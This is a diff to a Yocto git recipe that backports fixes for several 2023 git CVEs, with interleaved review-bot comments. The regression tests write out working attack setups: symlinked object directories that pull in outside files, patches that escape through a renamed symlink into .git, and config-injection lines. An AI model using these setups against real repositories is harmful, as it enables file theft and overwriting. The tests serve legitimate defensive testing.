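+--- a/t/t5619-clone-local-ambiguous-transport.sh
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -53,11 +53,18 @@ test_expect_success 'setup' '
+ git -C "$REPO" update-server-info
+ '
+
+-test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++test_expect_success 'ambiguous transport does not lead to arbitrary file-inclusion' '
+ git clone malicious clone &&
+- git -C clone submodule update --init &&
+-
+- test_path_is_missing clone/.git/modules/sub/objects/secret
++ test_must_fail git -C clone submodule update --init 2>err &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret &&
++ # We would actually expect "transport .file. not allowed" here,
++ # but due to quirks of the URL detection in Git, we mis-parse
++ # the absolute path as a bogus URL and die before that step.
++ #
++ # This works for now, and if we ever fix the URL detection, it
++ # is OK to change this to detect the transport error.
++ grep "protocol .* is not supported" err
+ '
+
+ test_done
+--
+2.25.1
+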
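Review bot: The relocated `transport_get()` call in cmd_clone() carries no comment explaining why it now has to come after `get_repo_path()` and take `path` when one was found, so a later cleanup could move it back above the `is_local` decision. I would add above it `/* Choose the transport only after is_local is settled, and from the same path, so the two cannot disagree. */`. On the test side, the new `grep "protocol .* is not supported" err` matches an error that the test's own comment describes as a URL-detection quirk, so `test_path_is_missing` is the assertion that actually guards the fix. cmd_clone() begins and ends outside the hunks.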
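--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
@@ -0,0 +1,154 @@
+From bffc762f87ae8d18c6001bf0044a76004245754c Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:51 -0500
+Subject: [PATCH 3/3] dir-iterator: prevent top-level symlinks without FOLLOW_SYMLINKS
+
+When using the dir_iterator API, we first stat(2) the base path, and
+then use that as a starting point to enumerate the directory's contents.
+
+If the directory contains symbolic links, we will immediately die() upon
+encountering them without the `FOLLOW_SYMLINKS` flag. The same is not
+true when resolving the top-level directory, though.
+
+As explained in a previous commit, this oversight in 6f054f9
+(builtin/clone.c: disallow `--local` clones with symlinks, 2022-07-28)
+can be used as an attack vector to include arbitrary files on a victim's
+filesystem from outside of the repository.
+
+Prevent resolving top-level symlinks unless the FOLLOW_SYMLINKS flag is
+given, which will cause clones of a repository with a symlink'd
+"$GIT_DIR/objects" directory to fail.
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/bffc762f87ae8d18c6001bf0044a76004245754c]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dir-iterator.c | 13 +++++++++----
+ dir-iterator.h | 5 +++++
+ t/t0066-dir-iterator.sh | 27 ++++++++++++++++++++++++++-
+ t/t5604-clone-reference.sh | 16 ++++++++++++++++
+ 4 files changed, 56 insertions(+), 5 deletions(-)
+
+diff --git a/dir-iterator.c b/dir-iterator.c
+index b17e9f9..3764dd8 100644
+--- a/dir-iterator.c
++++ b/dir-iterator.c
+@@ -203,7 +203,7 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ {
+ struct dir_iterator_int *iter = xcalloc(1, sizeof(*iter));
+ struct dir_iterator *dir_iterator = &iter->base;
+- int saved_errno;
++ int saved_errno, err;
+
+ strbuf_init(&iter->base.path, PATH_MAX);
+ strbuf_addstr(&iter->base.path, path);
+@@ -213,10 +213,15 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ iter->flags = flags;
+
+ /*
+- * Note: stat already checks for NULL or empty strings and
+- * inexistent paths.
++ * Note: stat/lstat already checks for NULL or empty strings and
++ * nonexistent paths.
+ */
+- if (stat(iter->base.path.buf, &iter->base.st) < 0) {
++ if (iter->flags & DIR_ITERATOR_FOLLOW_SYMLINKS)
++ err = stat(iter->base.path.buf, &iter->base.st);
++ else
++ err = lstat(iter->base.path.buf, &iter->base.st);
++
++ if (err < 0) {
+ saved_errno = errno;
+ goto error_out;
+ }
+diff --git a/dir-iterator.h b/dir-iterator.h
+index 0822915..e3b6ff2 100644
+--- a/dir-iterator.h
++++ b/dir-iterator.h
+@@ -61,6 +61,11 @@
+ * not the symlinks themselves, which is the default behavior. Broken
+ * symlinks are ignored.
+ *
++ * Note: setting DIR_ITERATOR_FOLLOW_SYMLINKS affects resolving the
++ * starting path as well (e.g., attempting to iterate starting at a
++ * symbolic link pointing to a directory without FOLLOW_SYMLINKS will
++ * result in an error).
++ *
+ * Warning: circular symlinks are also followed when
+ * DIR_ITERATOR_FOLLOW_SYMLINKS is set. The iteration may end up with
+ * an ELOOP if they happen and DIR_ITERATOR_PEDANTIC is set.
+diff --git a/t/t0066-dir-iterator.sh b/t/t0066-dir-iterator.sh
+index 92910e4..c826f60 100755
+--- a/t/t0066-dir-iterator.sh
++++ b/t/t0066-dir-iterator.sh
+@@ -109,7 +109,9 @@ test_expect_success SYMLINKS 'setup dirs with symlinks' '
+ mkdir -p dir5/a/c &&
+ ln -s ../c dir5/a/b/d &&
+ ln -s ../ dir5/a/b/e &&
+- ln -s ../../ dir5/a/b/f
++ ln -s ../../ dir5/a/b/f &&
++
++ ln -s dir4 dir6
+ '
+
+ test_expect_success SYMLINKS 'dir-iterator should not follow symlinks by default' '
+@@ -145,4 +147,27 @@ test_expect_success SYMLINKS 'dir-iterator should follow symlinks w/ follow flag
+ test_cmp expected-follow-sorted-output actual-follow-sorted-output
+ '
+
++test_expect_success SYMLINKS 'dir-iterator does not resolve top-level symlinks' '
++ test_must_fail test-tool dir-iterator ./dir6 >out &&
++
++ grep "ENOTDIR" out
++'
++
++test_expect_success SYMLINKS 'dir-iterator resolves top-level symlinks w/ follow flag' '
++ cat >expected-follow-sorted-output <<-EOF &&
++ [d] (a) [a] ./dir6/a
++ [d] (a/f) [f] ./dir6/a/f
++ [d] (a/f/c) [c] ./dir6/a/f/c
++ [d] (b) [b] ./dir6/b
++ [d] (b/c) [c] ./dir6/b/c
++ [f] (a/d) [d] ./dir6/a/d
++ [f] (a/e) [e] ./dir6/a/e
++ EOF
++
++ test-tool dir-iterator --follow-symlinks ./dir6 >out &&
++ sort out >actual-follow-sorted-output &&
++
++ test_cmp expected-follow-sorted-output actual-follow-sorted-output
++'
++
+ test_done
+diff --git a/t/t5604-clone-reference.sh b/t/t5604-clone-reference.sh
+index 4894237..615b981 100755
+--- a/t/t5604-clone-reference.sh
++++ b/t/t5604-clone-reference.sh
+@@ -354,4 +354,20 @@ test_expect_success SYMLINKS 'clone repo with symlinked or unknown files at obje
+ test_must_be_empty T--shared.objects-symlinks.raw
+ '
+
++test_expect_success SYMLINKS 'clone repo with symlinked objects directory' '
++ test_when_finished "rm -fr sensitive malicious" &&
++
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/file &&
++
++ git init malicious &&
++ rm -fr malicious/.git/objects &&
++ ln -s "$(pwd)/sensitive" ./malicious/.git/objects &&
++
++ test_must_fail git clone --local malicious clone 2>err &&
++
++ test_path_is_missing clone &&
++ grep "failed to start iterator over" err
++'
++
+ test_done
+--
+2.25.1
+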
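Review bot: The new `lstat()` in dir_iterator_begin() checks the starting path by name, so its result only holds if the path is not replaced between this call and the point where the directory is actually opened, which is outside the hunk. If that later step opens the same path string, a symlink put in place during the gap would still be followed, which matters where another user can modify the source tree during a local clone. It is worth confirming how the directory is opened; if it is by path, opening it with `O_NOFOLLOW | O_DIRECTORY` and calling `fstat()` on the descriptor would tie the check to the object that is read. The function continues past the end of the hunk.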
diff --git a/meta/recipes-devtools/git/files/CVE-2023-23946.patch b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
new file mode 100644
index 0000000000..3629ff57b2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
@@ -0,0 +1,184 @@
1From fade728df1221598f42d391cf377e9e84a32053f Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 2 Feb 2023 11:54:34 +0100
4Subject: [PATCH] apply: fix writing behind newly created symbolic links
5
6When writing files git-apply(1) initially makes sure that none of the
7files it is about to create are behind a symlink:
8
9```
10 $ git init repo
11 Initialized empty Git repository in /tmp/repo/.git/
12 $ cd repo/
13 $ ln -s dir symlink
14 $ git apply - <<EOF
15 diff --git a/symlink/file b/symlink/file
16 new file mode 100644
17 index 0000000..e69de29
18 EOF
19 error: affected file 'symlink/file' is beyond a symbolic link
20```
21
22This safety mechanism is crucial to ensure that we don't write outside
23of the repository's working directory. It can be fooled though when the
24patch that is being applied creates the symbolic link in the first
25place, which can lead to writing files in arbitrary locations.
26
27Fix this by checking whether the path we're about to create is
28beyond a symlink or not. Tightening these checks like this should be
29fine as we already have these precautions in Git as explained
30above. Ideally, we should update the check we do up-front before
31starting to reflect the computed changes to the working tree so that
32we catch this case as well, but as part of embargoed security work,
33adding an equivalent check just before we try to write out a file
34should serve us well as a reasonable first step.
35
36Digging back into history shows that this vulnerability has existed
37since at least Git v2.9.0. As Git v2.8.0 and older don't build on my
38system anymore I cannot tell whether older versions are affected, as
39well.
40
41Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
42Signed-off-by: Patrick Steinhardt <ps@pks.im>
43Signed-off-by: Junio C Hamano <gitster@pobox.com>
44
45Upstream-Status: Backport
46[https://github.com/git/git/commit/fade728df1221598f42d391cf377e9e84a32053f]
47CVE: CVE-2023-23946
48Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
49---
50 apply.c | 27 ++++++++++++++
51 t/t4115-apply-symlink.sh | 81 ++++++++++++++++++++++++++++++++++++++++
52 2 files changed, 108 insertions(+)
53
54diff --git a/apply.c b/apply.c
55index f8a046a..4f303bf 100644
56--- a/apply.c
57+++ b/apply.c
58@@ -4373,6 +4373,33 @@ static int create_one_file(struct apply_state *state,
59 if (state->cached)
60 return 0;
61
62+ /*
63+ * We already try to detect whether files are beyond a symlink in our
64+ * up-front checks. But in the case where symlinks are created by any
65+ * of the intermediate hunks it can happen that our up-front checks
66+ * didn't yet see the symlink, but at the point of arriving here there
67+ * in fact is one. We thus repeat the check for symlinks here.
68+ *
69+ * Note that this does not make the up-front check obsolete as the
70+ * failure mode is different:
71+ *
72+ * - The up-front checks cause us to abort before we have written
73+ * anything into the working directory. So when we exit this way the
74+ * working directory remains clean.
75+ *
76+ * - The checks here happen in the middle of the action where we have
77+ * already started to apply the patch. The end result will be a dirty
78+ * working directory.
79+ *
80+ * Ideally, we should update the up-front checks to catch what would
81+ * happen when we apply the patch before we damage the working tree.
82+ * We have all the information necessary to do so. But for now, as a
83+ * part of embargoed security work, having this check would serve as a
84+ * reasonable first step.
85+ */
86+ if (path_is_beyond_symlink(state, path))
87+ return error(_("affected file '%s' is beyond a symbolic link"), path);
88+
89 res = try_create_file(state, path, mode, buf, size);
90 if (res < 0)
91 return -1;
92diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
93index 872fcda..1acb7b2 100755
94--- a/t/t4115-apply-symlink.sh
95+++ b/t/t4115-apply-symlink.sh
96@@ -44,4 +44,85 @@ test_expect_success 'apply --index symlink patch' '
97
98 '
99
100+test_expect_success 'symlink setup' '
101+ ln -s .git symlink &&
102+ git add symlink &&
103+ git commit -m "add symlink"
104+'
105+
106+test_expect_success SYMLINKS 'symlink escape when creating new files' '
107+ test_when_finished "git reset --hard && git clean -dfx" &&
108+
109+ cat >patch <<-EOF &&
110+ diff --git a/symlink b/renamed-symlink
111+ similarity index 100%
112+ rename from symlink
113+ rename to renamed-symlink
114+ --
115+ diff --git /dev/null b/renamed-symlink/create-me
116+ new file mode 100644
117+ index 0000000..039727e
118+ --- /dev/null
119+ +++ b/renamed-symlink/create-me
120+ @@ -0,0 +1,1 @@
121+ +busted
122+ EOF
123+
124+ test_must_fail git apply patch 2>stderr &&
125+ cat >expected_stderr <<-EOF &&
126+ error: affected file ${SQ}renamed-symlink/create-me${SQ} is beyond a symbolic link
127+ EOF
128+ test_cmp expected_stderr stderr &&
129+ ! test_path_exists .git/create-me
130+'
131+
132+test_expect_success SYMLINKS 'symlink escape when modifying file' '
133+ test_when_finished "git reset --hard && git clean -dfx" &&
134+ touch .git/modify-me &&
135+
136+ cat >patch <<-EOF &&
137+ diff --git a/symlink b/renamed-symlink
138+ similarity index 100%
139+ rename from symlink
140+ rename to renamed-symlink
141+ --
142+ diff --git a/renamed-symlink/modify-me b/renamed-symlink/modify-me
143+ index 1111111..2222222 100644
144+ --- a/renamed-symlink/modify-me
145+ +++ b/renamed-symlink/modify-me
146+ @@ -0,0 +1,1 @@
147+ +busted
148+ EOF
149+
150+ test_must_fail git apply patch 2>stderr &&
151+ cat >expected_stderr <<-EOF &&
152+ error: renamed-symlink/modify-me: No such file or directory
153+ EOF
154+ test_cmp expected_stderr stderr &&
155+ test_must_be_empty .git/modify-me
156+'
157+
158+test_expect_success SYMLINKS 'symlink escape when deleting file' '
159+ test_when_finished "git reset --hard && git clean -dfx && rm .git/delete-me" &&
160+ touch .git/delete-me &&
161+
162+ cat >patch <<-EOF &&
163+ diff --git a/symlink b/renamed-symlink
164+ similarity index 100%
165+ rename from symlink
166+ rename to renamed-symlink
167+ --
168+ diff --git a/renamed-symlink/delete-me b/renamed-symlink/delete-me
169+ deleted file mode 100644
170+ index 1111111..0000000 100644
171+ EOF
172+
173+ test_must_fail git apply patch 2>stderr &&
174+ cat >expected_stderr <<-EOF &&
175+ error: renamed-symlink/delete-me: No such file or directory
176+ EOF
177+ test_cmp expected_stderr stderr &&
178+ test_path_is_file .git/delete-me
179+'
180+
181 test_done
182--
1832.25.1
184
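Review bot: The added 'symlink setup' test in t/t4115-apply-symlink.sh runs `ln -s .git symlink` without the SYMLINKS prerequisite that the three tests after it carry, so on a filesystem without symlink support the setup step may fail rather than be skipped. Gating it the same way, `test_expect_success SYMLINKS 'symlink setup' '`, keeps the file consistent. On the apply.c side, the new `path_is_beyond_symlink()` call in create_one_file() runs after earlier parts of the patch may already have been written, as the in-code comment itself says. Anything that applies untrusted patches should therefore treat a failure here as "working tree is dirty", not "nothing was changed". create_one_file() starts and ends outside the hunk.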
diff --git a/meta/recipes-devtools/git/files/CVE-2023-25652.patch b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
new file mode 100644
index 0000000000..d6b17a2b8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
@@ -0,0 +1,94 @@
1From 9db05711c98efc14f414d4c87135a34c13586e0b Mon Sep 17 00:00:00 2001
2From: Johannes Schindelin <johannes.schindelin@gmx.de>
3Date: Thu, 9 Mar 2023 16:02:54 +0100
4Subject: [PATCH] apply --reject: overwrite existing `.rej` symlink if it
5 exists
6
7The `git apply --reject` is expected to write out `.rej` files in case
8one or more hunks fail to apply cleanly. Historically, the command
9overwrites any existing `.rej` files. The idea being that
10apply/reject/edit cycles are relatively common, and the generated `.rej`
11files are not considered precious.
12
13But the command does not overwrite existing `.rej` symbolic links, and
14instead follows them. This is unsafe because the same patch could
15potentially create such a symbolic link and point at arbitrary paths
16outside the current worktree, and `git apply` would write the contents
17of the `.rej` file into that location.
18
19Therefore, let's make sure that any existing `.rej` file or symbolic
20link is removed before writing it.
21
22Reported-by: RyotaK <ryotak.mail@gmail.com>
23Helped-by: Taylor Blau <me@ttaylorr.com>
24Helped-by: Junio C Hamano <gitster@pobox.com>
25Helped-by: Linus Torvalds <torvalds@linuxfoundation.org>
26Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
27
28Upstream-Status: Backport [https://github.com/git/git/commit/9db05711c98efc14f414d4c87135a34c13586e0b]
29CVE: CVE-2023-25652
30Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
31---
32 apply.c | 14 ++++++++++++--
33 t/t4115-apply-symlink.sh | 15 +++++++++++++++
34 2 files changed, 27 insertions(+), 2 deletions(-)
35
36diff --git a/apply.c b/apply.c
37index 4f303bf..aa7111d 100644
38--- a/apply.c
39+++ b/apply.c
40@@ -4531,7 +4531,7 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
41 FILE *rej;
42 char namebuf[PATH_MAX];
43 struct fragment *frag;
44- int cnt = 0;
45+ int fd, cnt = 0;
46 struct strbuf sb = STRBUF_INIT;
47
48 for (cnt = 0, frag = patch->fragments; frag; frag = frag->next) {
49@@ -4571,7 +4571,17 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
50 memcpy(namebuf, patch->new_name, cnt);
51 memcpy(namebuf + cnt, ".rej", 5);
52
53- rej = fopen(namebuf, "w");
54+ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
55+ if (fd < 0) {
56+ if (errno != EEXIST)
57+ return error_errno(_("cannot open %s"), namebuf);
58+ if (unlink(namebuf))
59+ return error_errno(_("cannot unlink '%s'"), namebuf);
60+ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
61+ if (fd < 0)
62+ return error_errno(_("cannot open %s"), namebuf);
63+ }
64+ rej = fdopen(fd, "w");
65 if (!rej)
66 return error_errno(_("cannot open %s"), namebuf);
67
68diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
69index 1acb7b2..2b034ff 100755
70--- a/t/t4115-apply-symlink.sh
71+++ b/t/t4115-apply-symlink.sh
72@@ -125,4 +125,19 @@ test_expect_success SYMLINKS 'symlink escape when deleting file' '
73 test_path_is_file .git/delete-me
74 '
75
76+test_expect_success SYMLINKS '--reject removes .rej symlink if it exists' '
77+ test_when_finished "git reset --hard && git clean -dfx" &&
78+
79+ test_commit file &&
80+ echo modified >file.t &&
81+ git diff -- file.t >patch &&
82+ echo modified-again >file.t &&
83+
84+ ln -s foo file.t.rej &&
85+ test_must_fail git apply patch --reject 2>err &&
86+ test_i18ngrep "Rejected hunk" err &&
87+ test_path_is_missing foo &&
88+ test_path_is_file file.t.rej
89+'
90+
91 test_done
92--
932.25.1
94
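Review bot: In write_out_one_reject() the descriptor from the new `open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666)` is not closed when `fdopen(fd, "w")` fails; the function returns through `error_errno()` with `fd` still open. Closing it on that path, e.g. `if (!rej) { error_errno(_("cannot open %s"), namebuf); close(fd); return -1; }`, avoids the leak and reports errno before close() can change it. The unlink followed by a second `O_EXCL` open is what stops the write from following an existing `.rej` symlink. That deserves a one-line comment above the first `open()`, such as `/* O_EXCL: never follow or reuse an existing .rej, it may be a symlink */`. The function body starts and ends outside both apply.c hunks.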
diff --git a/meta/recipes-devtools/git/files/CVE-2023-29007.patch b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
new file mode 100644
index 0000000000..e166c01412
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
@@ -0,0 +1,159 @@
1From 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce Mon Sep 17 00:00:00 2001
2From: Taylor Blau <me@ttaylorr.com>
3Date: Fri, 14 Apr 2023 11:46:59 -0400
4Subject: [PATCH] Merge branch 'tb/config-copy-or-rename-in-file-injection'
5
6Avoids issues with renaming or deleting sections with long lines, where
7configuration values may be interpreted as sections, leading to
8configuration injection. Addresses CVE-2023-29007.
9
10* tb/config-copy-or-rename-in-file-injection:
11 config.c: disallow overly-long lines in `copy_or_rename_section_in_file()`
12 config.c: avoid integer truncation in `copy_or_rename_section_in_file()`
13 config: avoid fixed-sized buffer when renaming/deleting a section
14 t1300: demonstrate failure when renaming sections with long lines
15
16Signed-off-by: Taylor Blau <me@ttaylorr.com>
17
18Upstream-Status: Backport [https://github.com/git/git/commit/528290f8c61222433a8cf02fb7cfffa8438432b4]
19CVE: CVE-2023-29007
20Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
21---
22 config.c | 36 +++++++++++++++++++++++++-----------
23 t/t1300-config.sh | 30 ++++++++++++++++++++++++++++++
24 2 files changed, 55 insertions(+), 11 deletions(-)
25
26diff --git a/config.c b/config.c
27index e7052b3..676b687 100644
28--- a/config.c
29+++ b/config.c
30@@ -2987,9 +2987,10 @@ void git_config_set_multivar(const char *key, const char *value,
31 multi_replace);
32 }
33
34-static int section_name_match (const char *buf, const char *name)
35+static size_t section_name_match (const char *buf, const char *name)
36 {
37- int i = 0, j = 0, dot = 0;
38+ size_t i = 0, j = 0;
39+ int dot = 0;
40 if (buf[i] != '[')
41 return 0;
42 for (i = 1; buf[i] && buf[i] != ']'; i++) {
43@@ -3042,6 +3043,8 @@ static int section_name_is_ok(const char *name)
44 return 1;
45 }
46
47+#define GIT_CONFIG_MAX_LINE_LEN (512 * 1024)
48+
49 /* if new_name == NULL, the section is removed instead */
50 static int git_config_copy_or_rename_section_in_file(const char *config_filename,
51 const char *old_name,
52@@ -3051,11 +3054,12 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
53 char *filename_buf = NULL;
54 struct lock_file lock = LOCK_INIT;
55 int out_fd;
56- char buf[1024];
57+ struct strbuf buf = STRBUF_INIT;
58 FILE *config_file = NULL;
59 struct stat st;
60 struct strbuf copystr = STRBUF_INIT;
61 struct config_store_data store;
62+ uint32_t line_nr = 0;
63
64 memset(&store, 0, sizeof(store));
65
66@@ -3092,16 +3096,25 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
67 goto out;
68 }
69
70- while (fgets(buf, sizeof(buf), config_file)) {
71- int i;
72- int length;
73+ while (!strbuf_getwholeline(&buf, config_file, '\n')) {
74+ size_t i, length;
75 int is_section = 0;
76- char *output = buf;
77- for (i = 0; buf[i] && isspace(buf[i]); i++)
78+ char *output = buf.buf;
79+
80+ line_nr++;
81+
82+ if (buf.len >= GIT_CONFIG_MAX_LINE_LEN) {
83+ ret = error(_("refusing to work with overly long line "
84+ "in '%s' on line %"PRIuMAX),
85+ config_filename, (uintmax_t)line_nr);
86+ goto out;
87+ }
88+
89+ for (i = 0; buf.buf[i] && isspace(buf.buf[i]); i++)
90 ; /* do nothing */
91- if (buf[i] == '[') {
92+ if (buf.buf[i] == '[') {
93 /* it's a section */
94- int offset;
95+ size_t offset;
96 is_section = 1;
97
98 /*
99@@ -3118,7 +3131,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
100 strbuf_reset(&copystr);
101 }
102
103- offset = section_name_match(&buf[i], old_name);
104+ offset = section_name_match(&buf.buf[i], old_name);
105 if (offset > 0) {
106 ret++;
107 if (new_name == NULL) {
108@@ -3193,6 +3206,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
109 out_no_rollback:
110 free(filename_buf);
111 config_store_data_clear(&store);
112+ strbuf_release(&buf);
113 return ret;
114 }
115
116diff --git a/t/t1300-config.sh b/t/t1300-config.sh
117index 983a0a1..9b67f6b 100755
118--- a/t/t1300-config.sh
119+++ b/t/t1300-config.sh
120@@ -616,6 +616,36 @@ test_expect_success 'renaming to bogus section is rejected' '
121 test_must_fail git config --rename-section branch.zwei "bogus name"
122 '
123
124+test_expect_success 'renaming a section with a long line' '
125+ {
126+ printf "[b]\\n" &&
127+ printf " c = d %1024s [a] e = f\\n" " " &&
128+ printf "[a] g = h\\n"
129+ } >y &&
130+ git config -f y --rename-section a xyz &&
131+ test_must_fail git config -f y b.e
132+'
133+
134+test_expect_success 'renaming an embedded section with a long line' '
135+ {
136+ printf "[b]\\n" &&
137+ printf " c = d %1024s [a] [foo] e = f\\n" " " &&
138+ printf "[a] g = h\\n"
139+ } >y &&
140+ git config -f y --rename-section a xyz &&
141+ test_must_fail git config -f y foo.e
142+'
143+
144+test_expect_success 'renaming a section with an overly-long line' '
145+ {
146+ printf "[b]\\n" &&
147+ printf " c = d %525000s e" " " &&
148+ printf "[a] g = h\\n"
149+ } >y &&
150+ test_must_fail git config -f y --rename-section a xyz 2>err &&
151+ test_i18ngrep "refusing to work with overly long line in .y. on line 2" err
152+'
153+
154 cat >> .git/config << EOF
155 [branch "zwei"] a = 1 [branch "vier"]
156 EOF
157--
1582.25.1
159
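Review bot: The `GIT_CONFIG_MAX_LINE_LEN` check in git_config_copy_or_rename_section_in_file() runs only after `strbuf_getwholeline()` has returned. Assuming that helper buffers the complete line, as its name suggests, the limit bounds what gets parsed, not how much memory an overly long config line makes the process allocate. A comment at the check would keep it from being read as an allocation cap: `/* the line is already fully buffered here; this limits parsing, not memory */`. Separately, the patch header's `From 057c07a7…` line and its `Upstream-Status` URL (`…/commit/528290f8…`) name different commits, which makes the backport harder to trace to its upstream source. The function starts and ends outside the visible hunks.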
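--- a/meta/recipes-devtools/git/git.inc
+++ b/meta/recipes-devtools/git/git.inc
@@ -1,5 +1,6 @@
 SUMMARY = "Distributed version control system"
 HOMEPAGE = "http://git-scm.com"
+DESCRIPTION = "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency."
 SECTION = "console/utils"
 LICENSE = "GPLv2"
 DEPENDS = "openssl curl zlib expat"
@@ -7,14 +8,44 @@ DEPENDS = "openssl curl zlib expat"
 PROVIDES_append_class-native = " git-replacement-native"
 
 SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
- ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
+ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \
+ file://fixsort.patch \
+ file://CVE-2021-40330.patch \
+ file://CVE-2022-23521.patch \
+ file://CVE-2022-41903-01.patch \
+ file://CVE-2022-41903-02.patch \
+ file://CVE-2022-41903-03.patch \
+ file://CVE-2022-41903-04.patch \
+ file://CVE-2022-41903-05.patch \
+ file://CVE-2022-41903-06.patch \
+ file://CVE-2022-41903-07.patch \
+ file://CVE-2022-41903-08.patch \
+ file://CVE-2022-41903-09.patch \
+ file://CVE-2022-41903-10.patch \
+ file://CVE-2022-41903-11.patch \
+ file://CVE-2022-41903-12.patch \
+ file://CVE-2023-22490-1.patch \
+ file://CVE-2023-22490-2.patch \
+ file://CVE-2023-22490-3.patch \
+ file://CVE-2023-23946.patch \
+ file://CVE-2023-29007.patch \
+ file://CVE-2023-25652.patch \
+ "
 S = "${WORKDIR}/git-${PV}"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1"
 
 CVE_PRODUCT = "git-scm:git"
 
+# This is about a manpage not mentioning --mirror may "leak" information
+# in mirrored git repos. Most OE users wouldn't build the docs and
+# we don't see this as a major issue for our general users/usecases.
+CVE_CHECK_WHITELIST += "CVE-2022-24975"
+# This is specific to Git-for-Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41953"
+# specific to Git for Windows
+CVE_CHECK_WHITELIST += "CVE-2023-22743"
+
 PACKAGECONFIG ??= ""
 PACKAGECONFIG[cvsserver] = ""
 PACKAGECONFIG[svn] = ""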
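Review bot: The SRC_URI list has an ordering dependency that nothing in the recipe records. CVE-2023-25652.patch changes apply.c starting from blob `4f303bf`, which is what CVE-2023-23946.patch produces (`f8a046a..4f303bf`), and both extend t/t4115-apply-symlink.sh. The two are in the right order now, with CVE-2023-29007.patch between them out of numeric sequence. A comment above SRC_URI, such as `# CVE-2023-25652.patch applies on top of CVE-2023-23946.patch (apply.c, t4115); keep that order`, would stop a later re-sort from breaking patch application. Among the whitelist entries, CVE-2022-24975 is an accepted risk rather than a not-applicable one, and its comment could say so in those words.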
diff --git a/meta/recipes-devtools/git/git/fixsort.patch b/meta/recipes-devtools/git/git/fixsort.patch
new file mode 100644
index 0000000000..eec1f84945
--- /dev/null
+++ b/meta/recipes-devtools/git/git/fixsort.patch
@@ -0,0 +1,36 @@
1[PATCH] generate-cmdlist.sh: Fix determinism issue
2
3Currently git binaries are not entirely reproducible, at least partly
4due to config-list.h differing in order depending on the system's
5locale settings. Under different locales, the entries:
6
7"sendemail.identity",
8"sendemail.<identity>.*",
9
10would differ in order for example and this leads to differences in
11the debug symbols for the binaries.
12
13This can be fixed by specifying the C locale for the sort in the
14shell script generating the header.
15
16Note: This is a backport of Richard Purdie's original patch for a more
17recent version of git. The offending code in this older version is
18in generate-cmdlist.sh. The upstream current version has this code
19in generate-configlist.sh.
20
21Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
22Signed-off-by: Steve Sakoman <steve@sakoman.com>
23Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u]
24
25index 71158f7..c137091 100755
26--- a/generate-cmdlist.sh
27+++ b/generate-cmdlist.sh
28@@ -82,7 +82,7 @@ static const char *config_name_list[] = {
29 EOF
30 grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt |
31 sed '/deprecated/d; s/::$//; s/, */\n/g' |
32- sort |
33+ LC_ALL=C sort |
34 while read line
35 do
36 echo " \"$line\","
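--- a/meta/recipes-devtools/git/git_2.24.3.bb
+++ b/meta/recipes-devtools/git/git_2.24.4.bb
@@ -5,5 +5,5 @@ EXTRA_OECONF += "ac_cv_snprintf_returns_bogus=no \
  "
 EXTRA_OEMAKE += "NO_GETTEXT=1"
 
-SRC_URI[tarball.sha256sum] = "ef6d1d1de1d7921a54d23d07479bd2766f050d6435cea5d3b5322aa4897cb3d7"
-SRC_URI[manpages.sha256sum] = "325795ba33c0be02370de79636f32ad3b447665c1f2b5b4de65181fa804bed31"
+SRC_URI[tarball.sha256sum] = "6e119e70d3762f28e1dc9928c526eb4d7519fd3870f862775cd10186653eb85a"
+SRC_URI[manpages.sha256sum] = "e687bcc91a6fd9cb74243f91a9c2d77c50ce202a09b35931021ecc521a373ed5"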
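--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -1,10 +1,11 @@
 SUMMARY = "Vendor Package Management for Golang"
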